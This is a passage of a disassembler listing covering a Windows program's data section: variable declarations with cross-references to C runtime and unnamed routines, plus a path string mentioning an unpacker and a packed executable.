byte_425FF1 db 104h dup(0) ; DATA XREF: __NMSG_WRITE+8A�o
byte_4260F5 db 0 ; DATA XREF: __NMSG_WRITE+92�w
align 4
dd 7Dh dup(0)
dword_4262EC dd 0 ; DATA XREF: _malloc+80�r
; __NMSG_WRITE+E3�o ...
dword_4262F0 dd 0 ; DATA XREF: ___libm_error_support+8�r
align 8
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv+1D�o
; .data:off_425FA8�o
align 4
dd 3Ah dup(0)
byte_4263FC db 0 ; DATA XREF: __setargv+24�w
align 10h
dword_426400 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+2�r
; ___crtGetEnvironmentStringsA+24�w ...
dword_426404 dd 77C26E79h ; DATA XREF: __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)+43�r
; $LN9_2+11�w ...
byte_426408 db 1 ; DATA XREF: __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *):$LN10_2�r
; $LN9_2+17�w ...
align 4
off_42640C dd offset ?terminate@@YAXXZ ; DATA XREF: _inconsistency(void)+C�r
; __initp_eh_hooks+B�w
; terminate(void)
dword_426410 dd 1 ; DATA XREF: unknown_libname_111+14�r
; unknown_libname_111+3A�w ...
dword_426414 dd 1 ; DATA XREF: __crtGetStringTypeA_stat(localeinfo_struct *,ulong,char const *,int,ushort *,int,int,int)+F�r
; __crtGetStringTypeA_stat(localeinfo_struct *,ulong,char const *,int,ushort *,int,int,int)+37�w ...
dword_426418 dd 0 ; DATA XREF: .data:off_423F3C�o
; .data:off_423F40�o ...
dword_42641C dd 77E7C706h ; DATA XREF: sub_40CAFA+4�w
; ___crtInitCritSecAndSpinCount+11�r ...
dword_426420 dd 0 ; DATA XREF: __get_printf_count_output+A�r
dword_426424 dd 0 ; DATA XREF: __initp_misc_winsig+4�w
; unknown_libname_119:loc_40DD72�o ...
dword_426428 dd 0 ; DATA XREF: __initp_misc_winsig+9�w
; unknown_libname_119:loc_40DDC8�o ...
dword_42642C dd 0 ; DATA XREF: __initp_misc_winsig+E�w
; sub_40DD1C�r ...
dword_426430 dd 0 ; DATA XREF: __initp_misc_winsig+13�w
; unknown_libname_119:loc_40DDD4�o ...
align 8
dword_426438 dd 0 ; DATA XREF: unknown_libname_126+4�w
dd 2 dup(0)
dword_426444 dd 0 ; DATA XREF: sub_40DEE3+4�w
dd 0Fh dup(0)
dword_426484 dd 0 ; DATA XREF: __openfile+6�r
dword_426488 dd 0 ; DATA XREF: sub_40F524+10�r
; sub_40F524+60�w ...
dword_42648C dd 0 ; DATA XREF: sub_40F524+75�w
; sub_40F524:loc_40F672�r
dword_426490 dd 0 ; DATA XREF: sub_40F524+82�w
; sub_40F524+167�r
dword_426494 dd 0 ; DATA XREF: sub_40F524+D0�w
; sub_40F524:loc_40F5F9�r
dword_426498 dd 0 ; DATA XREF: sub_40F524+BA�w
; sub_40F524+E1�r ...
align 10h
dword_4264A0 dd 0 ; DATA XREF: __fpmath+F�w
dd 2Fh dup(0)
dword_426560 dd 0 ; DATA XREF: sub_410889:loc_4108B1�r
byte_426564 db 0 ; DATA XREF: __cftoe2_l:loc_410B90�r
align 4
dword_426568 dd 0 ; DATA XREF: sub_419A10+4B�r
; sub_419EA0+E6�w ...
dword_42656C dd 0 ; DATA XREF: sub_419948+14�r
; sub_4199AC+14�r ...
dword_426570 dd 0 ; DATA XREF: sub_4198D2+1D�r
; sub_419EA0+136�w ...
dword_426574 dd 0 ; DATA XREF: sub_419A10+1C�r
; sub_419EA0+AA�w ...
dword_426578 dd 0 ; DATA XREF: sub_419EA0+BE�w
; sub_419EA0+16D�r ...
dword_42657C dd 0 ; DATA XREF: sub_419EA0+D2�w
; sub_419EA0+179�r ...
dword_426580 dd 0 ; DATA XREF: sub_419948+34�r
; sub_4199AC+34�r ...
dword_426584 dd 0 ; DATA XREF: sub_419A10+63�r
; sub_419EA0+FA�w ...
dword_426588 dd 0 ; DATA XREF: sub_419EA0+14A�w
; sub_419EA0+322�r
dword_42658C dd 0 ; DATA XREF: sub_419EA0+96�w
; sub_419EA0+155�r ...
dword_426590 dd 0 ; DATA XREF: sub_419948+4D�r
; sub_4199AC+4D�r ...
dword_426594 dd 0 ; DATA XREF: sub_401C1D+6D�r
; sub_418B1F+A9�w ...
dword_426598 dd 0 ; DATA XREF: sub_401CC0+14F�r
; sub_41748B+11D�r ...
dword_42659C dd 0 ; DATA XREF: sub_401CC0+149�r
; sub_41748B+116�r ...
dword_4265A0 dd 0 ; DATA XREF: sub_401CC0+143�r
; sub_418DA0+61�w
dword_4265A4 dd 0 ; DATA XREF: sub_401CC0+13D�r
; sub_418DA0+66�w
dword_4265A8 dd 0 ; DATA XREF: sub_401CC0+137�r
; sub_418DA0+71�w
dword_4265AC dd 0 ; DATA XREF: sub_401CC0+12A�r
; sub_418DA0+76�w
dword_4265B0 dd 0 ; DATA XREF: sub_418D5A�r
; sub_418D5A:loc_418D8F�w ...
dword_4265B4 dd 0 ; DATA XREF: sub_418D5A+5�r
; sub_418D5A+3B�w ...
dword_4265B8 dd 0 ; DATA XREF: sub_418D5A+15�r
; sub_4192FB+20�w ...
dword_4265BC dd 0 ; DATA XREF: sub_4192FB+25�w
dd 33h dup(0)
dword_42668C dd 2 dup(0) ; DATA XREF: sub_4192FB+43�o
word_426694 dw 0 ; DATA XREF: sub_41835D+8�o
; sub_418B1F+AE�w ...
word_426696 dw 0 ; DATA XREF: sub_418B1F+D1�w
dword_426698 dd 0 ; DATA XREF: sub_418B1F+BD�w
dd 2 dup(0)
dword_4266A4 dd 0 ; DATA XREF: sub_418C40+6�r
; sub_418C40+73�r ...
dword_4266A8 dd 41h dup(0) ; DATA XREF: sub_418552+1ED�o
; sub_418552+224�o ...
dword_4267AC dd 0 ; DATA XREF: sub_41835D+D�r
; sub_418B1F+84�w ...
; char Str1
Str1 db 0 ; DATA XREF: sub_418552+293�o
; sub_418552+477�o ...
align 4
dd 40h dup(0)
byte_4268B4 db 0 ; DATA XREF: sub_401F1C:loc_401F83�r
; sub_418B1F+117�w ...
align 4
dword_4268B8 dd 41h dup(0) ; DATA XREF: sub_418552:loc_41876F�o
; sub_418B1F+1A�o
dword_4269BC dd 0 ; DATA XREF: sub_40177B+263�o
; sub_4019F3+215�o ...
byte_4269C0 db 0 ; DATA XREF: sub_413A2D+53D�r
; sub_418301:loc_418331�r ...
align 4
dd 8 dup(0)
dword_4269E4 dd 0 ; DATA XREF: sub_41B5D2+33�w
; sub_41B5D2+8F�r ...
; char Filename[]
Filename db 100h dup(0) ; DATA XREF: sub_41B3D0+49�o
; sub_41B775+21�o
; char Dest
Dest db 0 ; DATA XREF: sub_401CC0+16B�o
; sub_41A391+D7�o ...
align 4
dd 3Fh dup(0)
dword_426BE8 dd 0 ; DATA XREF: sub_401CC0+170�r
; sub_41A391+45�o
dword_426BEC dd 0 ; DATA XREF: sub_401CC0+17E�r
; sub_41A391:loc_41A51C�w ...
byte_426BF0 db 0 ; DATA XREF: sub_401F1C+4B7�w
align 4
dd 3Fh dup(0)
dword_426CF0 dd 0 ; DATA XREF: sub_401F1C+44A�r
; sub_401F1C+483�w
dd 3 dup(0)
db 0
byte_426D01 db 0 ; DATA XREF: sub_401F1C:loc_4020A2�r
; sub_40243A+AF�w
align 10h
dword_426D10 dd 0 ; DATA XREF: sub_40243A:loc_4024C3�r
dd 330Bh dup(0)
dword_433940 dd 0 ; DATA XREF: sub_40251A+A6�r
; sub_418552+501�r ...
db 0
byte_433945 db 0 ; DATA XREF: sub_401F1C+3E�r
; sub_41B5D2:loc_41B60E�w ...
align 4
dword_433948 dd 0 ; DATA XREF: sub_41B5D2+13B�w
dword_43394C dd 0 ; DATA XREF: sub_40251A+90�r
; sub_41B3D0:loc_41B53E�w ...
dword_433950 dd 5Eh dup(0) ; DATA XREF: sub_41A9DE+48A�o
dword_433AC8 dd 5Dh dup(0) ; DATA XREF: sub_41A9DE+4AD�o
dword_433C3C dd 0 ; DATA XREF: sub_417676+110�o
; sub_41BB84+43�o ...
; void *dword_433C40
dword_433C40 dd 9B3990h ; DATA XREF: sub_417676+109�r
; sub_417676+122�r ...
dword_433C44 dd 8 ; DATA XREF: sub_40121E+20�r
; sub_40121E:loc_40127B�w ...
dword_433C48 dd 0 ; DATA XREF: sub_40243A+F�o
; sub_413F8F+14�o ...
; void *dword_433C4C
dword_433C4C dd 9B3AA8h ; DATA XREF: sub_40243A:loc_402453�r
; sub_40243A:loc_402462�r ...
dword_433C50 dd 0 ; DATA XREF: sub_4016BA+20�r
; sub_4016BA:loc_401717�w ...
off_433C54 dd offset off_420AEC ; DATA XREF: sub_41C370+5C�o
; sub_41C370+66�w
off_433C58 dd offset off_420AE4 ; DATA XREF: sub_41C370+40�o
; sub_41C370+4A�w
off_433C5C dd offset off_420B04 ; DATA XREF: sub_41C370+78�o
; sub_41C370+82�w
off_433C60 dd offset off_420BC4 ; DATA XREF: sub_41C370+94�o
; sub_41C370+9E�w
off_433C64 dd offset off_420BCC ; DATA XREF: sub_41C370+B0�o
; sub_41C370+BA�w
dword_433C68 dd 2080Ah ; DATA XREF: sub_41A9DE+4FD�r
; sub_41C370+CE�w
off_433C6C dd offset off_420D24 ; DATA XREF: sub_41C370+F6�o
; sub_41C370+100�w
off_433C70 dd offset off_420D2C ; DATA XREF: sub_41C370+112�o
; sub_41C370+11C�w
off_433C74 dd offset off_420D1C ; DATA XREF: sub_41C370+DA�o
; sub_41C370+E4�w
dword_433C78 dd 1 ; DATA XREF: _ceil�r
; __sse2_mathfcns_init�w ...
dword_433C7C dd 1 ; DATA XREF: unknown_libname_13+28�r
; _memset+1E�r ...
dword_433C80 dd 0 ; DATA XREF: ___libm_error_support+34�r
dword_433C84 dd 20h ; DATA XREF: __ioinit+3C�w __ioinit+BF�w ...
dd 6 dup(0)
dword_433CA0 dd 9B20B0h ; DATA XREF: __flsbuf+FD�r
; ___initstdio+87�r ...
dd 3Fh dup(0)
; void *dword_433DA0
dword_433DA0 dd 9B3188h ; DATA XREF: ___initstdio+2B�w
; ___initstdio+44�w ...
dd 7 dup(0)
dword_433DC0 dd 400h dup(0) ; DATA XREF: .data:off_423950�o
; .data:00423958�o
dword_434DC0 dd 200h ; DATA XREF: ___initstdio�r
; ___initstdio:loc_4080A4�w ...
dword_434DC4 dd 0 ; DATA XREF: sub_407B65�w
dword_434DC8 dd 1 ; DATA XREF: __setenvp+B3�w
dword_434DCC dd 9B310Ch ; DATA XREF: __onexit_nolock+10�r
; __onexit_nolock+9B�w ...
dword_434DD0 dd 9B3100h ; DATA XREF: __onexit_nolock+5�r
; __onexit_nolock+87�w ...
dword_434DD4 dd 1 ; DATA XREF: ___initmbctable�r
; ___initmbctable+11�w ...
dword_434DD8 dd 0 ; DATA XREF: __cinit:loc_4079E2�r
; __cinit+74�o ...
dword_434DDC dd 0 ; DATA XREF: ___sbh_heap_init+28�w
; ___sbh_find_block�r ...
dword_434DE0 dd 0 ; DATA XREF: ___sbh_heap_init+15�w
; ___sbh_find_block+6�r ...
dword_434DE4 dd 0 ; DATA XREF: _V6_HeapAlloc+13�r
; ___sbh_heap_init+36�w ...
dword_434DE8 dd 0 ; DATA XREF: ___sbh_heap_init+2F�w
; ___sbh_free_block+2FC�w ...
dword_434DEC dd 0 ; DATA XREF: ___sbh_heap_init+3C�w
; ___sbh_alloc_new_region�r ...
dword_434DF0 dd 0 ; DATA XREF: ___sbh_free_block+229�r
; ___sbh_free_block+249�r ...
dword_434DF4 dd 1 ; DATA XREF: __msize:loc_402A7E�r
; _free+13�r ...
dword_434DF8 dd 152340h ; DATA XREF: ___tmainCRTStartup+113�w
; __wincmdln:loc_40AB95�r ...
_data ends
; Section 5. (virtual address 0003D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0003D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 43D000h
align 2000h
_idata2 ends
end $LN39